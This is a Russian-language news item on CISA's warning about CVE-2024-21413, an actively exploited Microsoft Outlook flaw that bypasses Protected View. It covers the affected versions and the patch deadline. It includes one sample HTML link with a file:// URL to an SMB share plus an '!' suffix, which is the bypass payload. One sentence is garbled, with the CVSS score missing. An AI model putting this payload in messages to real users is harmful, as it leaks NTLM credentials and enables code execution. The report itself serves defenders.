Агентство CISA предупреждает о необходимости срочно закрыть критическую уязвимость в Microsoft Outlook, которая уже используется злоумышленниками. Предупреждение особенно касается федеральных агентств. Уязвимость CVE-2024-21413 позволяет выполнять произвольный код на удалённых системах, обходя защитные механизмы Outlook.
Ошибка была обнаружена Check Point и связана с некорректной проверкой ввода при открытии писем с вредоносными ссылками в уязвимых версиях Outlook. Эксплуатация ошибки даёт злоумышленникам возможность обходить режим защищённого просмотра, предназначенный для блокировки опасного контента. В результате вредоносные файлы Office открываются в режиме редактирования, что позволяет загружать и выполнять вредоносный код.
Microsoft исправила CVE-2024-21413 (оценка CVSS: в 2024 году, но предупредила, что уязвимость остаётся активной даже в режиме предварительного просмотра документов. В отчёте Check Point говорится, что злоумышленники используют обходной метод, добавляя в ссылки с протоколом
file://
символ восклицательного знака и случайный текст после расширения файла. Такой подход позволяет обойти защитные механизмы Outlook и загрузить вредоносное содержимое. Пример:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Под угрозой находятся различные версии продуктов Microsoft:
Microsoft Office LTSC 2021;
Microsoft 365 Apps for Enterprise;
Microsoft Outlook 2016;
Microsoft Office 2019.
Успешная эксплуатация уязвимости может привести к краже NTLM-учётных данных и выполнению произвольного кода.
Федеральным агентствам необходимо устранить ошибку до 27 февраля в соответствии с директивой BOD 22-01. В CISA подчёркивают, что подобные уязвимости часто становятся целями хакеров и представляют серьёзную угрозу для государственной инфраструктуры. Хотя предписание касается госучреждений, специалисты настоятельно рекомендуют всем организациям срочно установить обновления безопасности, чтобы предотвратить возможные атаки.